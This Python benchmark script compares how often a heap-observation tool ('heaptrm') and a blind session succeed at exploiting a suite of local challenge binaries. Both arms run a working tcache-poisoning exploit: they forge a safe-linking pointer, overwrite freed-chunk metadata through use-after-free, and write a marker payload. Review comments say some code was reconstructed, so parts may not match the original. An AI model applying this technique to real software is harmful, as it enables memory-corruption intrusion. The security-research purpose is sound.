#!/usr/bin/env python3
"""
same_session_benchmark.py — The correct benchmark.

Both approaches run in the SAME process session:
  A: heaptrm session — observe addresses, compute exploit, execute in same session
  B: blind session — same binary, same protocol, but no heap observation

This tests: does structured heap observation enable exploitation
that's otherwise impossible?

No LLM needed — the exploit logic is deterministic given the addresses.
The question is purely: can we GET the addresses?
"""

import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict

ROOT = Path(__file__).parent.parent
SUITE = ROOT / "cve_tests" / "suite"
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
TRIALS = 10

# Hex payload written into the hijacked chunk (the bytes b"PWNED!!\n") and the
# prefix of it that is searched for in the read-back to decide success.
_PAYLOAD_HEX = "50574e454421210a"
_MARKER_HEX = "50574e4544"

# Offsets tried by the blind session when the target leaks nothing at all.
_BLIND_BASE = 0x555555559000
_BLIND_OFFSETS = (0x2a0, 0x300, 0x350, 0x400, 0x450,
                  0x500, 0x550, 0x600, 0x650, 0x700)


def _protect_ptr(target_addr, chunk_addr):
    """Return the fd value for ``target_addr`` stored in the chunk at ``chunk_addr``.

    The stored value is the target XORed with the storing chunk's address
    shifted right by 12 bits.
    """
    return target_addr ^ (chunk_addr >> 12)


def _parse_leaked_addr(line):
    """Return the first ``0x...`` token of ``line`` (bytes) as an int, or None."""
    if not line or b"0x" not in line:
        return None
    try:
        return int(line.split(b"0x")[1].split()[0], 16)
    except (ValueError, IndexError):
        return None


def _delta_marker(delta):
    """Return the glyph printed for a heaptrm-minus-blind success delta."""
    if delta > TRIALS // 2:
        return ">>>"
    if delta > 0:
        return ">"
    if delta == 0:
        return "=="
    return "<"


def heaptrm_session(binary: str, sc: int) -> bool:
    """Single heaptrm session: observe + exploit in same process.

    Starts ``HEAPTRM`` on ``binary`` and talks to it with one JSON object per
    line on stdin, reading one JSON reply per line from stdout.

    Args:
        binary: Path of the challenge binary to run under heaptrm.
        sc: Value sent as the last field of every ``1 <idx> <sc>`` command.

    Returns:
        True if the marker is found in the final read-back, False on any
        failure (no heap data, too few chunks, protocol or I/O error).
    """
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL, text=True
    )

    def cmd(action, data=""):
        # One request line out, one reply line back; an empty reply is {}.
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        return json.loads(line) if line.strip() else {}

    try:
        # Setup: alloc 3, free 2
        cmd("send", f"1 0 {sc}\n")
        cmd("send", f"1 1 {sc}\n")
        cmd("send", f"1 2 {sc}\n")
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # OBSERVE — this is what heaptrm provides
        r = cmd("observe")
        if not r.get("heap"):
            cmd("quit")
            return False

        chunks = r["heap"]["chunks"]

        def by_address(chunk):
            return int(chunk["address"], 16)

        freed = sorted((c for c in chunks if c["state"] == "freed"),
                       key=by_address)
        allocated = sorted((c for c in chunks if c["state"] == "allocated"),
                           key=by_address)
        if len(freed) < 2 or not allocated:
            cmd("quit")
            return False

        # COMPUTE — deterministic given addresses
        chunk1_addr = int(freed[-1]["address"], 16)
        target_addr = int(allocated[-1]["address"], 16)
        poisoned = _protect_ptr(target_addr, chunk1_addr)

        # NOTE(review): the source text from the struct.pack format string up
        # to the trailing ">= 0" comparison was lost before this file was
        # reviewed. Everything from here to the end of the ``try`` body is a
        # reconstruction that mirrors blind_session's command sequence —
        # confirm it against the original file.
        # Assumes the fd was packed as a little-endian unsigned 64-bit value
        # (what blind_session's p64 produces) — TODO confirm.
        fd_hex = poisoned.to_bytes(8, "little").hex()

        # EXECUTE — poison chunk 1's fd, allocate twice, write, read back
        cmd("send", f"2 1 {fd_hex}\n")
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")
        cmd("send", f"2 4 {_PAYLOAD_HEX}\n")
        reply = cmd("send", "3 2\n")
        cmd("quit")

        # NOTE(review): the reply field that carries the target's output is
        # not visible in the surviving source, so the whole serialized reply
        # is searched instead of one named key — confirm against heaptrm.
        return json.dumps(reply).find(_MARKER_HEX) >= 0
    except Exception:
        # Deliberate best-effort: any protocol or I/O failure is a failed trial.
        pass
    finally:
        # Always reap the tracer and release its pipes, whatever happened.
        try:
            proc.kill()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            pass
        for pipe in (proc.stdin, proc.stdout):
            try:
                pipe.close()
            except OSError:
                pass
    return False


def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Same process, but no heap observation. Uses only binary output.

    Args:
        binary: Path of the challenge binary to run directly.
        sc: Value sent as the last field of every ``1 <idx> <sc>`` command.
        config: Manifest entry for the challenge; accepted for call-site
            symmetry and not read here.

    Returns:
        True if the marker is found in the final read-back, False otherwise
        (including on any error while talking to the target).
    """
    # Imported here so the module can be loaded without pwntools installed.
    from pwn import process as pwn_process, p64, context
    context.log_level = "error"
    p = pwn_process(binary)

    def do(cmd):
        p.sendline(cmd.encode())
        return p.recvline(timeout=1).strip()

    def attempt(fd_value):
        # Poison chunk 1's fd, allocate twice, write the payload through the
        # second allocation and check whether it shows up in slot 2.
        do(f"2 1 {p64(fd_value).hex()[:16]}")
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")
        do(f"2 4 {_PAYLOAD_HEX}")
        result = do("3 2")
        return _MARKER_HEX.encode() in result

    try:
        r0 = do(f"1 0 {sc}")
        r1 = do(f"1 1 {sc}")
        r2 = do(f"1 2 {sc}")
        do("4 0")
        do("4 1")

        # Try to extract info from binary output:
        # check for address leaks in alloc output
        addr0 = _parse_leaked_addr(r0)
        addr1 = _parse_leaked_addr(r1)
        addr2 = _parse_leaked_addr(r2)

        # Try UAF read
        leaked_fd = None
        leak = do("3 1")
        if leak and leak not in (b"DELETED", b"ERR") and len(leak) >= 16:
            try:
                leaked_fd = int(leak[:16], 16)
            except ValueError:
                pass

        # Compute based on available info
        poisoned = None
        if addr1 and addr2:
            poisoned = _protect_ptr(addr2, addr1)
        elif leaked_fd and not addr1:
            # Decrypt fd with guessed key
            key = 0x555555559
            decrypted = leaked_fd ^ key
            if 0x555555550000 < decrypted < 0x555555570000:
                target = decrypted + 0xa0
                poisoned = target ^ key
        elif addr0 and not addr1 and not addr2:
            # Only first address — guess offsets
            poisoned = _protect_ptr(addr0 + 0xa0, addr0 + 0x50)

        if poisoned is None:
            # Pure blind — try common offsets
            for off in _BLIND_OFFSETS:
                c1 = _BLIND_BASE + off + 0x50
                tgt = c1 + 0x50
                # Wrong — must restart (tcache corrupted), so the outcome of
                # the first guess is final for this session.
                # NOTE(review): the collapsed source does not show whether the
                # failure return sat inside or after this loop; "inside" is
                # kept here, which means only the first offset is ever tried.
                return attempt(_protect_ptr(tgt, c1))
            return False

        return attempt(poisoned)
    except Exception:
        # Any failure talking to the target counts as a failed trial.
        # KeyboardInterrupt is no longer swallowed.
        return False
    finally:
        try:
            p.close()
        except Exception:
            pass


def main():
    """Run both sessions TRIALS times per challenge and report success rates.

    Reads ``manifest.json`` from ``SUITE``, skips challenges whose binary is
    missing, prints one line per challenge and a per-difficulty summary, and
    writes the raw counts to ``bench/same_session_results.json`` under the
    current working directory.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text())

    print("=" * 80)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print("=" * 80)

    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc):
                ht += 1
            if blind_session(binary, sc, config):
                bl += 1

        diff = config["difficulty"]
        bucket = by_diff[diff]
        bucket["ht"] += ht
        bucket["bl"] += bl
        bucket["n"] += TRIALS

        marker = _delta_marker(ht - bl)
        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")

        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
        })

    print("\n" + "=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
    for diff in ["easy", "medium", "hard", "extreme"]:
        d = by_diff.get(diff)
        if not d or d["n"] == 0:
            continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    total_n = sum(d["n"] for d in by_diff.values())
    if total_n:
        print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")
    else:
        # Empty manifest or no binaries on disk: nothing to average.
        print(f"{'OVERALL':10s} n/a (no trials were run)")

    Path("bench").mkdir(exist_ok=True)
    with open("bench/same_session_results.json", "w") as f:
        json.dump(all_results, f, indent=2)


if __name__ == "__main__":
    main()